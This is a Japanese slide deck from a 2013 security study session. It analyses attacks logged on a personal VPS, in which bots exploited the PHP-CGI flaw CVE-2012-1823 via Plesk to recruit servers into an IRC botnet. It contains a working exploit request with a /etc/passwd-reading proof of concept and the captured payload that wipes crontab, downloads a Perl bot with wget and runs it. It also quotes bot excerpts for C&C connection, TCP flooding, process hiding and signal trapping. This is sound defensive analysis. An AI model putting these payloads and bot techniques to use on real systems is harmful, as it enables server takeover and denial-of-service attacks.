さくらのVPSに来た攻撃観察記

さくらのVPSに来た、いろ
いろアタック観察記
さくらのVPSに来たいろいろアタック観察記 (@ozuma5119) 1
"GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 318 "-" "ZmEu"
"GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 200 748 "-" "ZmEu"
"GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 305 "-" "ZmEu"
"GET /pma/scripts/setup.php HTTP/1.1" 404 298 "-" "ZmEu"
66.160.128.164 - - [31/Jul/2013:18:46:17 +0900] "POST
/%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%7
7%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%6
4+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73
%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%
3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63
%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%6
1%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%
5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A
%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 288 "-" "-"
2013/10/6 すみだITセキュリティ勉強会 @ozuma5119

• @ozuma5119
• ネット企業でセキュリティサービスを
やっているエンジニア
• http://d.hatena.ne.jp/ozuma/
• 科学写真家(と名乗っている)
自己紹介

はじめに
• この中で話すこと
– OSやミドルウェアの脆弱性とかよくITニュース
サイトに載ってるけど、放っておくとどうなる
の？
• 今日話さないこと
– セキュアなサーバ構築の具体的手法、など
– それはまぁ、色々と教科書的なものがあるのでこ
こでわざわざ話すこと無いかな、と……
– でも普通の教科書にはほとんど載ってない話をす
るので楽しんでいただけると。思います。たぶん。
LPIC 「Linuxセキュリティ標準教科書」
http://www.lpi.or.jp/linuxtext/security.shtml

話すことの概要
• 個人で借りているさくらのVPSにいろいろ
来るので、その攻撃を観察してみた
– 悪いことしてる人たちがどうしようとしてい
るかが、なんとなくかいま見えた。ので誰か
に言いたくなった
• ボットネット。
– クラウド流行りで世界中にとてもたくさんの
「野良サーバ」ができたので、悪い人達は、
うひょうひょ言いながら狙ってる

ボットネット?
「ボットネットからの保護」http://www.microsoft.com/ja-jp/security/pc-security/botnet.aspx より引用

ボットネットのクラウド化
• ボットネット自体は7,8年くらい前から登
場している
• 一般ユーザのPCをマルウェア感染させ、
ボットネットに組み込んでいる
– ボットネットはIRCを使って、C&C(コマンド&
コントロール)サーバから指示を受け取る
• ボットネット構成マシンとして、最近は、
一般ユーザのPCより、性能的にもネット
ワーク的にも有利なVPSやクラウドサーバ
を狙うものが多い

こんなん見ました・その１
• サーバ管理ソフトPlesk Panelの脆弱性を
放っておくとどうなるか。
– PHPの脆弱性でもあるんだけど
– /phppath/php のおはなし

最近よく見るhttpdのログ
• みなさんも見ましたか。見てませんか。
• あちこちのWebサーバ複数で同じリクエス
トが見られたので、相当広範囲にスキャ
ンしてたようです
66.160.128.164 - - [31/Jul/2013:18:46:17 +0900] "POST
/%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%7
7%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%6
4+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73
%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%
3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63
%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%6
1%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%
5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A
%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 288 "-" "-"

ちなみにリクエスト元は
アクセス日時ソースIP 逆引きしたホスト名国名
01/Jul/2013:01:30:21 74.208.202.77
u16950462.onlinehome-
server.com
アメリカ
08/Jul/2013:05:51:32 117.120.2.111 (なし) シンガポール
19/Jul/2013:00:25:47 87.255.55.11 (なし) オランダ
24/Jul/2013:18:06:52 62.148.186.34
62-148-186-34-hosted-
by.denit.net
オランダ
31/Jul/2013:18:46:17
66.160.128.16
4
(なし) アメリカ
01/Aug/2013:11:01:22
114.141.196.2
8
svr1.gardenexpress.com.au
オーストラリ
ア
08/Aug/2013:12:17:33 67.205.102.43 bceco.cd カナダ
• ざっくり一週間おき?
• 中国からは一件も無かった。意外。

まずはリクエストされたパスを
分かりやすくする
66.160.128.164 - - [31/Jul/2013:18:46:17 +0900] "POST
/%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%7
7%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%6
4+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73
%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%
3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63
%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%6
1%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%
5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A
%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 288 "-" "-"
/phppath/php?-d allow_url_include=on -d safe_mode=off -d
suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d
auto_prepend_file=php://input -n
↓URLデコードします

見やすくすると
POST /phppath/php?-d allow_url_include=on
-d safe_mode=off
-d suhosin.simulation=on
-d disable_functions=""
-d open_basedir=none
-d auto_prepend_file=php://input
-n
• 見やすくするため改行も入れるとこうな
る
– Parallels Plesk Panelを狙っている
– PHPの脆弱性(CVE-2012-1823)を狙っている

Parallels Plesk Panel 9
• サーバ管理のWebツールとして広く利用さ
れており、Apache+PHPが同梱されている
• 以下のような設定がhttpd.confに設定され
ている豪快なつくり
– ScriptAlias /phppath/ /usr/bin/
• 同梱されているPHPは古いCGI版PHP
– これが悲劇を招く

CVE-2012-1823 脆弱性
• CGI版PHPの脆弱性
• PHPのオプションとしてGETパラメタがそ
のまま渡ってしまう
• Plesk Panel 9のPHPにもこの脆弱性アリ
例）ソースコードがそのまま表示されてしまう
http://192.168.1.1/important/apl.php?-s
$ man php
--syntax-highlight
-s Output HTML syntax highlighted source

CVE-2012-1823 脆弱性その2
• オプションを組み合わせると、POSTリク
エストのbody部をそのままサーバ上でPHP
スクリプトとして実行できてしまう
/phppath/php?-d allow_url_include=on
-d auto_prepend_file=php://input
• allow_url_include : 外部からのinclude許可
• auto_prepend_file : 開発時などに用いるパラ
メタで、スクリプト実行前に、指定したファ
イルをrequireして実行する

CVE-2012-1823 脆弱性その3
• つまり以下のような感じのPOSTを投げつ
けるだけで、お好きなPHPスクリプトを
サーバ上で実行させることができる
POST /phppath/php?-d allow_url_include=on
-d auto_prepend_file=php://input HTTP/1.1
Host: www.example.org
Content-Length: xxxx
<?php
readfile('/etc/passwd');
?>
参考URL
http://blog.tokumaru.org/2012/05/php-cgi-remote-scripting-cve-2012-1823.html

何を実行しようとしている?
• ということは、このアクセスも、悪い人
がサーバで実行しようとしているPHPスク
リプト本体がPOSTされてきているのだろ
う
– それは見てみたい!
• アクセスログだけ見ていてもつまらない
ので、tcpdumpしてPOSTリクエストのボ
ディ部(= 実行しようとしているPHPスクリ
プト)を見てみる

待つこと数日、ktkr

脆弱性スキャンされている
• "___2pac" という文字列をechoしているだけ
• おそらくレスポンスボディにこの文字列があ
るサーバをスキャンして探しているのだろう
POST /%70%68%70%70%6(省略)
HTTP/1.1
Host: 49.212.197.88
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
<?php echo "Content-Type:text/htmlrnrn";echo
"___2pacn"; ?>

脆弱性があるフリをしてみる
• POSTされたら上記CGIにRewriteする。(ち
なみにサーバにPHPはインストールすらし
てない)
• これで悪い人は「脆弱性あり」と判断し
て、続けて本番の攻撃スクリプトを送り
込んでくるはず →→ 来た。
#!/usr/bin/perl
print "Content-Type:text/htmlrnrn";
print "___2pacn";

攻撃は0.5秒後
• 1行目が"___2pac"をechoさせるPHPをPOST
• 2行目が本番の攻撃スクリプト
• 脆弱性アリと判断後、1秒も経たずに攻撃
– しかも攻撃元の 210.188.206.176はSAKURA Internet
– 偶然? 地理的に近いサーバを自動選択?
67.205.102.43 - - [08/Aug/2013:12:17:33 +0900] "POST
/%70%68(省略) HTTP/1.1" 200 8 "-" "-"
210.188.206.176 - - [08/Aug/2013:12:17:33 +0900] "POST
/%70%68(省略) HTTP/1.1" 200 8 "-" "Mozilla/5.0
(compatible; Googlebot/2.1;
+http://www.google.com/bot.html)"

POSTされた攻撃スクリプト
<?php
echo "Content-Type:text/htmlrnrn";
echo "OKn";
system("crontab -r;
cd /tmp;
rm -fr bpn*;
wget http://188.165.242.15/bpn -q;
perl bpn >/dev/null 1>/dev/null 2>/dev/null;
rm -fr bpn*");
?>
• system関数内でUNIXコマンドを実行した
いようです

脱線：crontab –r の恐怖
• crontab –e と間違えて crontab –r すると、何
の警告もなく全てが消え失せる
– crontab –e 禁止令を出す人もいる (/etc/crontabだ
け使う)
macbook:~ ozuma$ crontab -l
15 * * * * /home/ozuma/bin/hoge.sh
0 9 1 * * /home/ozuma/bin/piyo.sh > /dev/null 2>&1
*/5 * * * * /home/ozuma/bin/fuga.sh > /dev/null 2>&1
macbook:~ ozuma$ crontab -r
macbook:~ ozuma$ crontab -l
crontab: no crontab for ozuma
macbook:~ ozuma$

さらに攻撃スクリプトをダウン
ロードしている
<?php
echo "Content-Type:text/htmlrnrn";
echo "OKn";
system("crontab -r;
cd /tmp;
rm -fr bpn*;
wget http://188.165.242.15/bpn -q;
perl bpn >/dev/null 1>/dev/null 2>/dev/null;
rm -fr bpn*");
?>
• そこでこのbpnを手でwgetしてみた
188.165.242.15はOVH SAS(フラ
ンスのホスティング業者)

bpn - Perlbot抜粋
#!/usr/bin/perl
my $processo
=("suid","/usr/sbin/sshd","rpc.idmapd","auditd","crond","klogd -x");
my @titi = ("index.php?page=","main.php?page=");
my $goni = $titi[rand scalar @titi];
my $linas_max='3';
my $sleep='7';
my @adms=("LaCannA","amd-64bit" );
my
@hostauth=("lacannabiscaffe.smok","amd.de.lacannabiscaffe.smok");
my @canais=("#coffeeshop");
chop (my $nick = `uname`);
my $ircname =("weed");
my $realname = ("mary");
$servidor="209.20.83.28" unless $servidor;
my $porta='53';
209.20.83.28 : Rackspace Hosting
(アメリカのホスティング会社)
ポート53

ダウンロードしたbpn
• これはPerlBotとか言われてる有名なもの
– しかしソースコードは稚拙な部分も多い
• ボットネットのC&C(コマンド&コントロー
ル)サーバにIRC接続し、指示を待つ
• 興味ある方は以下へ置いてあります
– http://txt2url.com/d532f7a995b287eca6f7f2c527ba0bd5
• SANSの解説記事が参考になります
– http://handlers.sans.org/jullrich/perlbot.html

Perlbot抜粋その2
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
C&Cサーバ接続機能(IRC)

Perlbot抜粋その3
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
DoS攻撃機能

Perlbot概要
• C&Cサーバから以下のような感じで指令を
受けてDoS攻撃をする
– IRCの指定されたチャンネルに接続する
– 指令者のnickから攻撃先の指示がIRCのチャッ
トで送信されるため、それを元にDoS攻撃を
おこなう
• なぜIRCなのか？
– 多数のクライアントに伝達しやすい
– あとはまぁ、「ボットネットの伝統」

C&Cサーバを覗いてみると
• Perlbotスクリプトで指定されていたC&C
サーバを覗いてみる(危険)
$ telnet 209.20.83.28 53
Trying 209.20.83.28...
Connected to 209-20-83-28.static.cloud-ips.com.
Escape character is '^]'.
:irc.sudominio.org NOTICE AUTH :*** Looking up your
hostname...
:irc.sudominio.org NOTICE AUTH :*** Found your hostname

今回の攻撃のまとめ

攻撃を追ってみて分かったこと
• 最終目的はサーバを乗っ取ってボット
ネットに組み込むこと（そしてよそを攻
撃すること）
• 脆弱性スキャン役、攻撃役、スクリプト
配布役、制御役(C&Cサーバ)、全てが別
サーバで[分業]されている
• それぞれのサーバはクラウドやVPSなどの
「野良サーバ」が有効活用されている
– 昔は一般ユーザのPCが多かったが……

Perlbot (bpn)に見る小ネタ
• せっかくなので、さっき仕込まれそうに
なったbpnスクリプト(Perlbot)のソース
コードを読んでみて、そこから学ぶこと
はないか
– ポジティブシンキングしよう。

Perlbotに見る小ネタ1
#!/usr/bin/perl
my $processo
=("suid","/usr/sbin/sshd","rpc.idmapd","auditd","crond","klogd
-x");
...
(省略)
...
$0="$processo"."¥0"x16;;
• C&Cに接続して常駐するプロセスなので、発
見されにくくするための工夫がある。
• それがPerlの特殊変数 $0 への代入
– なぜセミコロンが2つあるかは謎だ。気にするな

$0 に値を入れないと
Perlスクリプト実行中なことがバレバレ

$0 に値を入れると
psコマンドの出力が$0の値に化けて見つか
りにくい

$0 に値を入れる(FreeBSD)
ちなみにFreeBSDだと後ろに (perl5.x.x) が
付くのでバレバレです

• シグナルをトラップしている
– 簡単にkillできないようになっている
• Perlでは%SIGに'IGNORE'とすると、該当シ
グナルを無視することができる
– すなわちkill –KILLでしか終了できなくなる
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';

Perlでのシグナル操作
• ちなみにこんな感じでkillを受け取ったら
実行されるサブルーチンも設定できる
– 作業ファイルを操作するとか。
– これがまっとうな使い方
#!/usr/bin/perl
...
...
$SIG{'TERM'} = sub {
die("Killed by SIGTERM.¥n");
};

Perlでのシグナル操作
• ちなみにこういうのを調べるときはうま
くmanとperldocを使いましょう
– すぐにググらずまずは公式ドキュメントを。
$ perldoc –q signal
$ perldoc perlfaq8
$ perldoc perlipc
$ man –aw signal
$ man 7 signal

• サーバを$serverじゃなくて$servidorと書い
ている
• 他にも $porta, $versao, $processo など
• スペイン語かポルトガル語っぽいけど
どっち？
– これどっちも似ているのでむつかしい
– どちらの言語でもサーバはservidorなので区別
できない
$servidor="209.20.83.28" unless $servidor;

攻撃スクリプトに透けてみえる
「中の人」
• スペイン語かポルトガル語かは、Version,
port, あたりを見ると分かりやすい
– Perlbotはポルトガル語のようです
• 元のソースを書いた「中の人」を想像す
ることで、悪い人の姿がちょっぴり透け
て見える気がしませんか。私はします。
スペイン語ポルトガル語
バージョン Versión Versão
ポート Puerto Porta

さくらのVPSに来た攻撃観察記

Recommended

More Related Content

What's hot (20)

Similar to さくらのVPSに来た攻撃観察記 (11)

さくらのVPSに来た攻撃観察記